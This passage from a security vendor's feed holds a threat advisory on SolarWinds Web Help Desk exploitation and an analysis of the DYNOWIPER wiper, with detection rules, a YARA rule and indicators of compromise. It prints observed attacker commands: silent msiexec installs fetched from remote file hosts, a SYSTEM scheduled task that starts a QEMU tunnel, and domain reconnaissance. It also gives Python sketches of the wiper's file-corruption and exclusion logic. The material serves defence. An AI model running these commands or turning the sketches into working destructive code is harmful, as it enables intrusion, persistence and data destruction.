<li>The exploitation facilitated multi-stage intrusions leveraging remote monitoring and management software (RMM), credential dumping, and setting up tunnels and RDP for persistent access</li>
<li>While not yet confirmed, the activity may be associated with one of the following disclosed CVEs: <a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2025-26399">CVE-2025-26399</a>, <a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40536">CVE-2025-40536</a>, and <a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40551">CVE-2025-40551</a></li>
<li>Elastic Security Labs has not observed telemetry events related to this activity as of the date of this publication</li>
<li>Elastic Defend provides comprehensive visibility, along with 5 prebuilt prevention and 11 prebuilt detection capabilities across this reported activity</li>
</ul>
<h2>Background</h2>
<p>Multiple intrusions have been publicly reported since February 6, 2026, stemming from Internet-connected servers running SolarWinds Web Help Desk <a href="https://support.solarwinds.com/web-help-desk">software</a>. This exploitation activity reportedly first occurred in December 2025.</p>
<p>Given the number of recent CVEs affecting this product, it’s not yet clear which of several CVEs is directly responsible for these campaigns. Below are the CVEs involved in this reported activity:</p>
<ul>
<li><code>CVE-2025-26399</code> - <a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2025-26399">SolarWinds Web Help Desk AjaxProxy Deserialization of Untrusted Data Remote Code Execution Vulnerability</a></li>
<li><code>CVE-2025-40536</code> - <a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40536">SolarWinds Web Help Desk Security Control Bypass Vulnerability</a></li>
<li><code>CVE-2025-40551</code> - <a href="https://www.solarwinds.com/trust-center/security-advisories/cve-2025-40551">SolarWinds Web Help Desk Deserialization of Untrusted Data Remote Code Execution Vulnerability</a></li>
</ul>
<p>Below is a table of the vulnerability descriptions and the impacted product versions:</p>
<table>
<thead>
<tr>
<th align="left">Vulnerability ID</th>
<th align="left">Vulnerability Description</th>
<th align="left">Affected Products</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">CVE-2025-26399</td>
<td align="left">Unauthenticated AjaxProxy deserialization remote code execution vulnerability</td>
<td align="left">SolarWinds Web Help Desk 12.8.7 and all previous versions</td>
</tr>
<tr>
<td align="left">CVE-2025-40536</td>
<td align="left">Susceptible to a security control bypass vulnerability</td>
<td align="left">SolarWinds Web Help Desk 12.8.8 HF1 and all previous versions</td>
</tr>
<tr>
<td align="left">CVE-2025-40551</td>
<td align="left">Untrusted data deserialization vulnerability</td>
<td align="left">SolarWinds Web Help Desk 12.8.8 HF1 and all previous versions</td>
</tr>
</tbody>
</table>
<p>After exploitation, the threat actors are documented to have abused otherwise legitimate RMM software to gain persistent access to victim environments. Additional reporting noted the use of <a href="https://docs.velociraptor.app/">Velociraptor</a> being abused for post-compromise execution, such as disabling Microsoft Defender and setting up a Cloudflare tunnel.</p>
<p>Once the threat actors had gained network access, they configured a scheduled task to start a QEMU virtual machine to maintain remote access. Credential dumping activity was also observed, including the use of DCSync and the extraction of the <code>NTDS.dit</code> database from a Windows domain controller.</p>
<p>The following sections detail Elastic Security detection and prevention rules that can detect and mitigate these intrusive activities.</p>
<h2>Execution Flow</h2>
<h3>Initial access</h3>
<p>Following the successful exploitation of the SolarWinds Web Help Desk (WHD), the threat actors established an interactive shell. Observations indicate a heavy reliance on &quot;living-off-the-land&quot; (LotL) techniques, where legitimate system utilities and programs such as RMMs are used to perform malicious actions.</p>
<p>The initial attack chain begins with the WHD service wrapper (<code>wrapper.exe</code>) spawning <code>java.exe</code>, which then spawns the Windows command processor (<code>cmd.exe</code>). An Elastic SIEM rule has been <a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/initial_access_potential_webhelpdesk_exploit.toml">created</a> for the community to detect unusual child process activity from the SolarWinds Web Help Desk application.</p>
<pre><code>any where host.os.type == &quot;windows&quot; and
(
 (event.category == &quot;library&quot; and
  process.executable : (&quot;C:\\Program Files\\WebHelpDesk\\*\\java.exe&quot;, &quot;C:\\Program Files (x86)\\WebHelpDesk\\*\\java.exe&quot;) and
  (dll.path : &quot;\\Device\\Mup\\*&quot; or dll.code_signature.trusted == false or ?dll.code_signature.exists == false)) or

 (event.category == &quot;process&quot; and process.name : (&quot;cmd.exe&quot;, &quot;powershell.exe&quot;, &quot;rundll32.exe&quot;) and
  process.parent.executable : (&quot;C:\\Program Files\\WebHelpDesk\\*\\java*.exe&quot;, &quot;C:\\Program Files (x86)\\WebHelpDesk\\*\\java*.exe&quot;))
)
</code></pre>
<p><em>SIEM Rule - Suspicious SolarWinds Web Help Desk Java Module Load or Child Process</em></p>
<p>One of the initial attack chains involved executing a remotely-hosted MSI installer from an anonymous file-hosting service called <a href="https://catbox.moe/">Catbox</a>. The following command line was observed:</p>
<pre><code>msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi
</code></pre>
<p>In order to detect this activity, Elastic has a SIEM prebuilt rule to detect remote installation of MSI files <a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_msiexec_remote_payload.toml">here</a>, and an endpoint behavior protection <a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_remote_file_execution_via_msiexec.toml">here</a>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/solarwinds-whd-exploitation/image2.png" alt="Alert - Remote File Execution via MSIEXEC" /></p>
<p>Suspicious child processes from Java and SolarWinds WHD represent the earliest phase of this attack, which resulted in the installation of an RMM MSI file. This remote monitoring and management utility provides some of the functionality of a conventional backdoor while resembling benign administrative software.</p>
<h3>Discovery</h3>
<p>After the RMM agent was configured, the threat group moved to hands-on-keyboard reconnaissance within the network, leveraging the RMM tooling to execute discovery commands targeting Active Directory information. An observed command line is shown below:</p>
<pre><code>net group &quot;domain computers&quot; /do
</code></pre>
<p>An existing SIEM rule designed to identify Windows account group discovery detects this reconnaissance technique and is available <a href="https://github.com/elastic/detection-rules/blob/main/rules_building_block/discovery_generic_account_groups.toml">here</a>.</p>
<h3>Evasion</h3>
<p>One of the more notable choices made by the threat actor in one campaign was the use of the open-source forensic tool <a href="https://github.com/Velocidex/velociraptor">Velociraptor</a>. While this legitimate tool is traditionally used to collect forensic artifacts from endpoints, the adversaries used it for code execution and file staging. The threat group silently installed Velociraptor using the remote MSI command shown below; a prebuilt Elastic Security rule covers this installation technique:</p>
<pre><code>msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/storage/v1/object/public/image/v4.msi
</code></pre>
<p>They followed this up with an installation of the Cloudflare Tunnel <a href="https://github.com/cloudflare/cloudflared">client</a> (<code>Cloudflared</code>) with the following command:</p>
<pre><code>msiexec /q /i hxxps://github[.]com/cloudflare/cloudflared/releases/latest/download/cloudflared-windows-amd64.msi
</code></pre>
<p>Echoing trends observed throughout 2025 and described in the <a href="https://www.elastic.co/security-labs/elastic-publishes-2025-global-threat-report">Elastic Global Threat Report</a>, adversaries increasingly abuse trusted networks for transport encryption and to take advantage of benign reputation. The remote MSI installation rules discussed earlier in this article also apply in this case; however, installing a legitimate security tool is likely to appear benign to many enterprises. Cisco Talos has previously <a href="https://blog.talosintelligence.com/velociraptor-leveraged-in-ransomware-attacks/">highlighted</a> this emerging attacker trend involving the use of Velociraptor for post-compromise activity.</p>
<p>Other observations in this intrusion set included the threat actor disabling security controls such as Windows Defender and Windows Firewall through registry key modifications. Existing Elastic <a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_defender_disabled_via_registry.toml">SIEM</a> and <a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_suspicious_windows_defender_registry_modification.toml">endpoint</a> rules identify these attempts to undermine security settings.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/solarwinds-whd-exploitation/image3.png" alt="Alert - Microsoft Windows Defender Tampering" /></p>
<h3>Persistence</h3>
<p>In order to maintain continued access, the threat actors set up a Windows scheduled task using the following command-line:</p>
<pre><code>SCHTASKS /CREATE /V1 /RU SYSTEM /SC ONSTART /F /TN &quot;TPMProfiler&quot; /TR &quot;C:\Users\&lt;user&gt;\tmp\qemu-system-x86_64.exe -m 1G -smp 1 -hda vault.db -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::22022-:22&quot;
</code></pre>
<p>This scheduled task named <code>TPMProfiler</code> was configured to execute <a href="https://www.qemu.org/">QEMU</a>, a system-level virtualization and emulation tool. QEMU was then used to establish an SSH connection, facilitating continued access to the compromised system.</p>
<p>Elastic Security published and maintains a SIEM detection <a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_local_scheduled_job_creation.toml">rule</a> to detect the creation of this scheduled task.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/solarwinds-whd-exploitation/image1.png" alt="Alert - Persistence via Scheduled Job Creation" /></p>
<p>To detect the QEMU tunneling activity, Elastic Security provides an Elastic Defend behavioral rule <a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/command_and_control_potential_traffic_tunneling_with_qemu.toml">here</a> and a prebuilt SIEM detection rule <a href="https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/command_and_control_tunnel_qemu.toml">here</a>.</p>
<h3>Credential Access</h3>
<p>As part of these attacks, Microsoft also mentioned credential dumping of the Active Directory Domain Database (<code>ntds.dit</code>). Elastic provides multiple detections for this behavior, including the rules referenced <a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml">here</a> and <a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_cmdline_dump_tool.toml">here</a>.</p>
<h3>Recommendations</h3>
<ol>
<li>Apply the latest SolarWinds Web Help Desk patches.</li>
<li>Rotate all service and administrative credentials that are associated with SolarWinds Web Help Desk.</li>
<li>Conduct host-level reviews of any impacted servers and endpoints to identify unauthorized activity.</li>
<li>Identify and remove any RMM usage associated with this activity. Review organizational policy and monitoring strategies for RMM tools.</li>
</ol>
<h3>Detecting SolarWinds WHD exploitation</h3>
<h4>Elastic Security prebuilt detection rules</h4>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/initial_access_potential_webhelpdesk_exploit.toml">Suspicious SolarWinds Web Help Desk Java Module Load or Child Process</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_msiexec_remote_payload.toml">Potential Remote Install via MsiExec</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_remote_file_execution_via_msiexec.toml">Remote File Execution via MSIEXEC</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules_building_block/discovery_generic_account_groups.toml">Windows Account or Group Discovery</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_defender_disabled_via_registry.toml">Windows Defender Disabled via Registry Modification</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/persistence_local_scheduled_job_creation.toml">Persistence via Scheduled Job Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_copy_ntds_sam_volshadowcp_cmdline.toml">NTDS or SAM Database File Copied</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_cmdline_dump_tool.toml">Potential Credential Access via Windows Utilities</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/793d79b0637135298c821a762a98312ad7f3c7d1/rules/windows/command_and_control_tunnel_vscode.toml#L39">Attempt to Establish VScode Remote Tunnel</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/df9c27d82e74eb51e39376f1af30d2beb738c673/rules/windows/command_and_control_new_terms_commonly_abused_rat_execution.toml#L26">First Time Seen Commonly Abused Remote Access Tool Execution</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/main/rules/cross-platform/command_and_control_tunnel_qemu.toml">Potential Traffic Tunneling using QEMU</a></li>
</ul>
<h4>Elastic Defend prebuilt prevention rules</h4>
<ul>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_remote_file_execution_via_msiexec.toml">Remote File Execution via MSIEXEC</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/main/behavior/rules/windows/defense_evasion_suspicious_windows_defender_registry_modification.toml">Suspicious Windows Defender Registry Modification</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/7ad65c2cfca7a6c54c74dbe6206e968234209f94/behavior/rules/windows/command_and_control_potential_traffic_tunneling_with_qemu.toml#L3">Potential Traffic Tunneling with QEMU</a></li>
<li><a href="https://github.com/elastic/endpoint-rules/blob/main/rules/windows/command_and_control_webservice_lolbas.toml">Connection to WebService by a Signed Binary Proxy</a></li>
<li><a href="https://github.com/elastic/protections-artifacts/blob/7ad65c2cfca7a6c54c74dbe6206e968234209f94/behavior/rules/cross-platform/execution_attempt_to_establish_vscode_remote_tunnel.toml#L16">Attempt to establish VScode Remote Tunnel</a></li>
</ul>
<h3>References</h3>
<ul>
<li><a href="https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/">https://www.microsoft.com/en-us/security/blog/2026/02/06/active-exploitation-solarwinds-web-help-desk/</a></li>
</ul>
<h3>MITRE ATT&amp;CK Mapping</h3>
<table>
<thead>
<tr>
<th align="left">Tactic</th>
<th align="left">Technique</th>
<th align="left">ID</th>
</tr>
</thead>
<tbody>
<tr>
<td align="left">Initial Access</td>
<td align="left">Exploit Public-Facing Application</td>
<td align="left">T1190</td>
</tr>
<tr>
<td align="left">Execution</td>
<td align="left">PowerShell</td>
<td align="left">T1059.001</td>
</tr>
<tr>
<td align="left">Lateral Movement</td>
<td align="left">Remote Service Session Hijacking</td>
<td align="left">T1563</td>
</tr>
<tr>
<td align="left">Credential Access</td>
<td align="left">OS Credential Dumping: LSASS Memory</td>
<td align="left">T1003.001</td>
</tr>
<tr>
<td align="left">Persistence</td>
<td align="left">Scheduled Task/Job</td>
<td align="left">T1053.005</td>
</tr>
</tbody>
</table>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/solarwinds-whd-exploitation/photo-edited-10.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[DYNOWIPER: Destructive Malware Targeting Poland's Energy Sector]]></title>
            <link>https://www.elastic.co/security-labs/dynowiper</link>
            <guid>dynowiper</guid>
            <pubDate>Fri, 06 Feb 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Learn how Elastic Defend's ransomware protection successfully detects and prevents DYNOWIPER execution using canary file monitoring.]]></description>
            <content:encoded><![CDATA[<h2>Summary</h2>
<ul>
<li>On December 29, 2025, a coordinated campaign of destructive cyberattacks targeted Poland's energy infrastructure, affecting over 30 renewable energy facilities and a major combined heat and power (CHP) plant</li>
<li>A custom wiper malware dubbed DYNOWIPER was used to irreversibly destroy data across compromised networks</li>
<li><a href="https://mwdb.cert.pl/">CERT Polska</a> attributes the attack infrastructure to the threat cluster that Cisco tracks as Static Tundra, CrowdStrike as Berserk Bear, Microsoft as Ghost Blizzard, and Symantec as Dragonfly</li>
<li>Elastic Defend's ransomware protection successfully detects and prevents DYNOWIPER execution using canary file monitoring</li>
</ul>
<h2>Background</h2>
<p>The coordinated destructive campaign against critical energy infrastructure occurred on December 29, 2025, during a period of severe winter weather in Poland.</p>
<p>According to CERT Polska’s report, the campaign targeted:</p>
<ul>
<li>30+ wind and solar farms across Poland</li>
<li>A major CHP plant supplying heat to nearly half a million customers</li>
<li>A manufacturing sector company characterized as an opportunistic target</li>
</ul>
<h3>Attack Vector</h3>
<p>The threat actor reportedly gained initial access through Fortinet FortiGate devices exposed to the internet prior to December 29th, exploiting:</p>
<ul>
<li>VPN interfaces allowing authentication without multi-factor authentication</li>
<li>Reused credentials across multiple facilities</li>
<li>Historical vulnerabilities in unpatched devices</li>
</ul>
<p>Attackers conducted months-long reconnaissance of industrial automation systems, specifically targeting SCADA systems and OT networks. During this time, they exfiltrated Active Directory databases, FortiGate configurations, and data related to OT network modernization.</p>
<h2>DYNOWIPER Details</h2>
<p>Elastic Security Labs independently analyzed a DYNOWIPER sample from open sources. The sample is similar to one of the variants documented by CERT Polska.</p>
<h3>Sample Metadata</h3>
<table>
<thead>
<tr>
<th>Property</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td><strong>SHA256</strong></td>
<td><code>835b0d87ed2d49899ab6f9479cddb8b4e03f5aeb2365c50a51f9088dcede68d5</code></td>
</tr>
<tr>
<td><strong>SHA1</strong></td>
<td><code>4ec3c90846af6b79ee1a5188eefa3fd21f6d4cf6</code></td>
</tr>
<tr>
<td><strong>MD5</strong></td>
<td><code>a727362416834fa63672b87820ff7f27</code></td>
</tr>
<tr>
<td><strong>File Type</strong></td>
<td>Windows PE32 Executable (GUI)</td>
</tr>
<tr>
<td><strong>Architecture</strong></td>
<td>32-bit x86</td>
</tr>
<tr>
<td><strong>File Size</strong></td>
<td>167,424 bytes</td>
</tr>
<tr>
<td><strong>Compiler</strong></td>
<td>Visual C++ (MSVC)</td>
</tr>
<tr>
<td><strong>Compilation Date</strong></td>
<td>2025-12-26 13:51:11 UTC</td>
</tr>
</tbody>
</table>
<h3>Destruction Mechanism</h3>
<h4>Drive Enumeration</h4>
<p>The malware enumerates all logical drives (A-Z) using <code>GetLogicalDrives()</code> and targets only <code>DRIVE_FIXED</code> (hard drives) and <code>DRIVE_REMOVABLE</code> (USB drives, SD cards) types.</p>
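<p>The <code>GetLogicalDrives()</code> return value is a bitmask in which bit 0 maps to <code>A:</code>, bit 1 to <code>B:</code>, and so on. The decoding logic can be sketched in Python (a platform-independent illustration using a sample bitmask rather than the live Windows API; on Windows the mask would come from <code>ctypes.windll.kernel32.GetLogicalDrives()</code>, and each drive would then be classified with <code>GetDriveTypeW</code> against <code>DRIVE_FIXED</code> (3) and <code>DRIVE_REMOVABLE</code> (2)):</p>

```python
# Decode a GetLogicalDrives()-style bitmask: bit 0 -> A:, bit 1 -> B:, ... bit 25 -> Z:
def decode_drive_mask(mask: int) -> list[str]:
    return [f"{chr(ord('A') + bit)}:\\" for bit in range(26) if mask & (1 << bit)]

# Example: a mask with bits 2 and 3 set corresponds to drives C: and D:
print(decode_drive_mask(0b1100))  # ['C:\\', 'D:\\']
```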
<h4>File Corruption</h4>
<p>DYNOWIPER employs a Mersenne Twister PRNG to generate pseudorandom data for file corruption. Rather than overwriting entire files (which requires time), it strategically corrupts files by:</p>
<ol>
<li>Removing file protection attributes via <code>SetFileAttributesW(FILE_ATTRIBUTE_NORMAL)</code></li>
<li>Opening files with <code>CreateFileW</code> for read/write access</li>
<li>Overwriting the file header with 16 bytes of random data</li>
<li>For larger files, generating up to 4,096 random offsets and overwriting each with 16-byte sequences</li>
</ol>
<p>This approach allows rapid corruption of many files while ensuring data is unrecoverable.</p>
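<p>To make the pattern concrete, the corruption routine described above can be simulated in a few lines of Python against an in-memory buffer (a defensive illustration of the on-disk effects, not code from the sample; the function name is ours, though Python's <code>random</code> module conveniently uses the same Mersenne Twister family of PRNG):</p>

```python
import random

HEADER_LEN = 16     # bytes overwritten at the start of each file
MAX_OFFSETS = 4096  # upper bound on additional corrupted spans

def corrupt_buffer(data: bytearray, rng: random.Random) -> bytearray:
    """Simulate the targeted corruption: destroy the header, then
    overwrite up to 4,096 random 16-byte spans with pseudorandom data."""
    data[:HEADER_LEN] = rng.randbytes(HEADER_LEN)
    for _ in range(min(MAX_OFFSETS, len(data) // HEADER_LEN)):
        offset = rng.randrange(0, max(1, len(data) - HEADER_LEN))
        data[offset:offset + HEADER_LEN] = rng.randbytes(HEADER_LEN)
    return data
```

<p>Because only a small fraction of each file is touched, the wiper finishes quickly, yet destroying the header and scattered interior spans renders most file formats unrecoverable.</p>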
<h4>Directory Exclusion List</h4>
<p>The malware deliberately avoids system-critical directories to maintain system stability during the attack:</p>
<ul>
<li><code>windows</code>, <code>system32</code></li>
<li><code>program files</code>, <code>program files(x86)</code></li>
<li><code>boot</code>, <code>appdata</code>, <code>temp</code></li>
<li><code>recycle.bin</code>, <code>$recycle.bin</code></li>
<li><code>perflogs</code>, <code>documents and settings</code></li>
</ul>
<p>This design choice maximizes data destruction <em>before</em> the system becomes unstable, ensuring the wiper completes its mission.</p>
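<p>A sketch of how such an exclusion check can work, matching each directory component of a path case-insensitively against the list above (the function name is illustrative; the actual malware performs equivalent string comparisons via the Windows API):</p>

```python
from pathlib import PureWindowsPath

# Exclusion list as documented above (lowercased for case-insensitive matching)
EXCLUDED_DIRS = {
    "windows", "system32", "program files", "program files(x86)",
    "boot", "appdata", "temp", "recycle.bin", "$recycle.bin",
    "perflogs", "documents and settings",
}

def path_is_excluded(path: str) -> bool:
    """Return True if any directory component of the path is on the
    exclusion list, i.e. the file would be skipped by the wiper."""
    parts = PureWindowsPath(path).parts
    # parts[0] is the drive (e.g. 'C:\\'), parts[-1] is the filename
    return any(part.lower() in EXCLUDED_DIRS for part in parts[1:-1])
```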
<h4>Forced Reboot</h4>
<p>After corruption and deletion phases complete, DYNOWIPER:</p>
<ol>
<li>Obtains a process token via <code>OpenProcessToken()</code></li>
<li>Enables <code>SeShutdownPrivilege</code> via <code>AdjustTokenPrivileges()</code></li>
<li>Forces system reboot with <code>ExitWindowsEx(EWX_REBOOT | EWX_FORCE)</code></li>
</ol>
<h3>Notable Characteristics</h3>
<p>DYNOWIPER is distinguished by several characteristics:</p>
<ul>
<li>No persistence mechanism - The malware does not attempt to survive reboots</li>
<li>No C2 communication - Completely standalone, no network callbacks</li>
<li>No shell command invocations - All operations performed via Windows API</li>
<li>No anti-analysis techniques - No attempts to evade detection or debugging</li>
<li>Characteristic PDB path: <code>C:\Users\vagrant\Documents\Visual Studio 2013\Projects\Source\Release\Source.pdb</code></li>
</ul>
<p>The use of &quot;vagrant&quot; in the PDB path suggests development occurred in a Vagrant-managed virtual machine environment.</p>
<h3>Version Differences</h3>
<p>CERT Polska documented two DYNOWIPER versions (A and B). The sample we analyzed corresponds to version A. Version B removed the system shutdown functionality and added a 5-second sleep between corruption and deletion phases.</p>
<h2>Elastic Defend Protection</h2>
<p>During testing of DYNOWIPER samples, Elastic Defend successfully detected and mitigated the malware before it could cause damage.</p>
<h3>Detection Alert</h3>
<pre><code class="language-json">{  
  &quot;message&quot;: &quot;Ransomware Prevention Alert&quot;,  
  &quot;event&quot;: {  
    &quot;code&quot;: &quot;ransomware&quot;,  
    &quot;action&quot;: &quot;canary-activity&quot;,  
    &quot;type&quot;: [&quot;info&quot;, &quot;start&quot;, &quot;change&quot;, &quot;denied&quot;],  
    &quot;category&quot;: [&quot;malware&quot;, &quot;intrusion_detection&quot;, &quot;process&quot;, &quot;file&quot;],  
    &quot;outcome&quot;: &quot;success&quot;  
  },  
  &quot;Ransomware&quot;: {  
    &quot;feature&quot;: &quot;canary&quot;,  
    &quot;version&quot;: &quot;1.9.0&quot;  
  }  
}  
</code></pre>
<h3>How Canary Protection Works</h3>
<p>Elastic Defend's ransomware protection employs canary files (strategically placed decoy files) that trigger alerts when modified. DYNOWIPER's indiscriminate file corruption approach caused it to modify a canary file.</p>
<p>When the wiper attempted to corrupt this canary file, Elastic Defend immediately:</p>
<ol>
<li>Detected the suspicious modification pattern</li>
<li>Blocked further execution</li>
<li>Generated a high-confidence ransomware alert (risk score: 73)</li>
</ol>
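<p>Conceptually, canary protection reduces to baselining decoy files and treating any change as a high-confidence signal, since no legitimate process should touch them. A simplified Python sketch of the alert condition (Elastic Defend monitors file operations in real time; this hash-comparison version is an illustration only, with hypothetical function names):</p>

```python
import hashlib
from pathlib import Path

def plant_canary(path: Path, content: bytes = b"decoy-document") -> str:
    """Write a decoy file and return its baseline SHA-256 digest."""
    path.write_bytes(content)
    return hashlib.sha256(content).hexdigest()

def canary_tripped(path: Path, baseline: str) -> bool:
    """Alert condition: the canary was deleted or its contents changed."""
    if not path.exists():
        return True
    return hashlib.sha256(path.read_bytes()).hexdigest() != baseline
```

<p>Because DYNOWIPER corrupts files indiscriminately, it inevitably touches a decoy, which is what allows canary-based protection to interrupt execution early.</p>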
<p>While Elastic Defend was not the EDR solution used in this incident, this form of defense-in-depth protection was critical in the real-world intrusion. According to CERT Polska, the EDR solution deployed at the CHP plant, using the same canary protection technology highlighted above, halted data overwriting on more than 100 machines where DYNOWIPER had already begun executing.</p>
<h2>Why Behavioral Detection is Crucial</h2>
<p>Destructive malware presents unique challenges to minimizing risk:</p>
<ul>
<li>It may not establish C2 connections (no network indicators)</li>
<li>It may not use persistence mechanisms (limited forensic artifacts)</li>
<li>It executes quickly and destructively</li>
<li>Static signature-based detection may miss new variants</li>
</ul>
<p>Behavioral protection, such as through canary files, provides a crucial layer of defense that can catch destructive malware regardless of its novelty.</p>
<h2>Indicators of Compromise</h2>
<h3>File Hashes (DYNOWIPER)</h3>
<table>
<thead>
<tr>
<th>SHA256</th>
<th>Filename</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>835b0d87ed2d49899ab6f9479cddb8b4e03f5aeb2365c50a51f9088dcede68d5</code></td>
<td>dynacom_update.exe</td>
</tr>
<tr>
<td><code>65099f306d27c8bcdd7ba3062c012d2471812ec5e06678096394b238210f0f7c</code></td>
<td>Source.exe</td>
</tr>
<tr>
<td><code>60c70cdcb1e998bffed2e6e7298e1ab6bb3d90df04e437486c04e77c411cae4b</code></td>
<td>schtask.exe</td>
</tr>
<tr>
<td><code>d1389a1ff652f8ca5576f10e9fa2bf8e8398699ddfc87ddd3e26adb201242160</code></td>
<td>schtask.exe</td>
</tr>
</tbody>
</table>
<h3>Distribution Scripts</h3>
<table>
<thead>
<tr>
<th>SHA256</th>
<th>Filename</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>8759e79cf3341406564635f3f08b2f333b0547c444735dba54ea6fce8539cf15</code></td>
<td>dynacon_update.ps1</td>
</tr>
<tr>
<td><code>f4e9a3ddb83c53f5b7717af737ab0885abd2f1b89b2c676d3441a793f65ffaee</code></td>
<td>exp.ps1</td>
</tr>
</tbody>
</table>
<h3>Network Indicators</h3>
<table>
<thead>
<tr>
<th>IP Address</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>185.200.177[.]10</code></td>
<td>VPN logins, direct DYNOWIPER execution</td>
</tr>
<tr>
<td><code>31.172.71[.]5</code></td>
<td>Reverse proxy for data exfiltration</td>
</tr>
<tr>
<td><code>193.200.17[.]163</code></td>
<td>VPN logins</td>
</tr>
<tr>
<td><code>185.82.127[.]20</code></td>
<td>VPN logins</td>
</tr>
<tr>
<td><code>72.62.35[.]76</code></td>
<td>VPN and O365 logins</td>
</tr>
</tbody>
</table>
<h3>YARA Rule</h3>
<pre><code class="language-yara">rule DYNOWIPER {  
    meta: 
        author = &quot;CERT Polska&quot;
        description = &quot;Detects DYNOWIPER data destruction malware&quot;  
        severity = &quot;CRITICAL&quot;  
        reference = &quot;https://mwdb.cert.pl/&quot;  
          
    strings:  
        $a1 = &quot;$recycle.bin&quot; wide  
        $a2 = &quot;program files(x86)&quot; wide  
        $a3 = &quot;perflogs&quot; wide  
        $a4 = &quot;windows\x00&quot; wide  
        $b1 = &quot;Error opening file: &quot; wide  
        $priv = &quot;SeShutdownPrivilege&quot; wide  
        $api1 = &quot;GetLogicalDrives&quot;  
        $api2 = &quot;ExitWindowsEx&quot;  
        $api3 = &quot;AdjustTokenPrivileges&quot;  
          
    condition:  
        uint16(0) == 0x5A4D  
        and filesize &lt; 500KB  
        and 4 of ($a*, $b1)  
        and $priv  
        and 2 of ($api*)  
}  
</code></pre>
<h2>Recommendations</h2>
<h3>Immediate Actions</h3>
<ol>
<li><strong>Deploy behavioral ransomware protection</strong> - Signature-based detection alone is insufficient against novel wipers</li>
<li><strong>Enable MFA on all VPN and remote access solutions</strong> - The attackers exploited accounts without MFA</li>
<li><strong>Audit FortiGate and edge device configurations</strong> - Check for unauthorized accounts, rules, and scheduled tasks</li>
<li><strong>Review default credentials</strong> - Industrial devices (RTUs, HMIs, serial servers) often ship with default passwords</li>
</ol>
<h3>Detection Opportunities</h3>
<p>Monitor for:</p>
<ul>
<li><code>GetLogicalDrives</code> API calls followed by mass file operations</li>
<li><code>SetFileAttributesW</code> calls setting <code>FILE_ATTRIBUTE_NORMAL</code> at scale</li>
<li>Privilege escalation for <code>SeShutdownPrivilege</code> followed by <code>ExitWindowsEx</code></li>
<li>GPO modifications creating scheduled tasks with SYSTEM privileges</li>
<li>Unusual file modifications across multiple drives simultaneously</li>
</ul>
<h3>Recovery Considerations</h3>
<ul>
<li><strong>Restore from offline/air-gapped backups</strong> - Online backups may have been targeted</li>
<li><strong>Verify backup integrity</strong> before restoration</li>
<li><strong>Assume credential compromise</strong> - Reset all passwords, especially domain admin accounts</li>
<li><strong>Audit all removable media</strong> that may have been connected to affected systems</li>
</ul>
<h2>Conclusion</h2>
<p>The December 2025 attacks on Poland's energy sector represent a significant escalation in destructive cyber operations against critical infrastructure. DYNOWIPER, while not technically sophisticated, proved effective at rapid data destruction when combined with the threat actor's extensive pre-positioned access.</p>
<p>The incident underscores the importance of defense-in-depth strategies, particularly behavioral detection capabilities that can identify destructive malware regardless of its novelty. Elastic Defend's ransomware protection—specifically its canary file monitoring—proved effective at detecting and blocking DYNOWIPER before it could complete its destructive mission.</p>
<p>Organizations in critical infrastructure sectors should review their security posture against the TTPs documented in this report and CERT Polska's comprehensive analysis.</p>
<hr />
<h2>References</h2>
<ul>
<li>CERT Polska: <a href="https://mwdb.cert.pl/">Energy Sector Incident Report – 29 December</a></li>
<li>Cisco Talos: <a href="https://blog.talosintelligence.com/static-tundra">Static Tundra</a></li>
<li>FBI IC3: <a href="https://www.ic3.gov/PSA/2025/PSA250820">PSA250820</a></li>
</ul>
<h2>MITRE ATT&amp;CK Mapping</h2>
<table>
<thead>
<tr>
<th>Tactic</th>
<th>Technique</th>
<th>ID</th>
</tr>
</thead>
